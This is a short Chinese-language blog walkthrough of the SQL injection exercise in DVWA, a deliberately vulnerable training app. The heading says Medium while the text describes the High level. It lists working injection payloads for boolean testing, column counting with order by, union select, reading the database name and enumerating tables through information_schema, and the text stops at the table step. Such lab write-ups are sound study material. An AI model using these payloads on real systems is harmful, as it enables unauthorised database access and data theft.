十九、SQL注入(SQL Injection)-Medium

Ant大约 1 分钟DVWASQL Injection

十九、SQL注入(SQL Injection)-Medium

一、查找注入点

High级别的SQL注入将查询内容的输入和结果的显示做了分离,使用两个页面实现查询功能。此时我们可以在查询页尝试寻找注入点。

查询和回显分离
查询和回显分离

在查询页输入1' and 1=1#,返回结果正常;在查询页输入1' and 1=2#,返回结果异常。可知and及其后面的内容可以被正常执行,此处存在注入点。

正常返回
正常返回
异常返回(无返回)
异常返回(无返回)

二、确定回显字段数量和位置

输入内容返回内容
1' order by 1#正常
1' order by 2#正常
1' order by 3#异常

由上述测试可知返回字段数量为2。

输入 1' union select 1,2# 查看两个字段回显的位置。

两个字段的回显位置
两个字段的回显位置

三、读取数据库内容

输入1' union select 1,database()# 在第二个字段的回显位置输出数据库名称

得到数据库名称为 dvwa

20250311212504
20250311212504

输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'# 在第二个字段的回显位置输出数据库名称

Loading...
好记性不如烂笔头
Copyright © 2025 Ant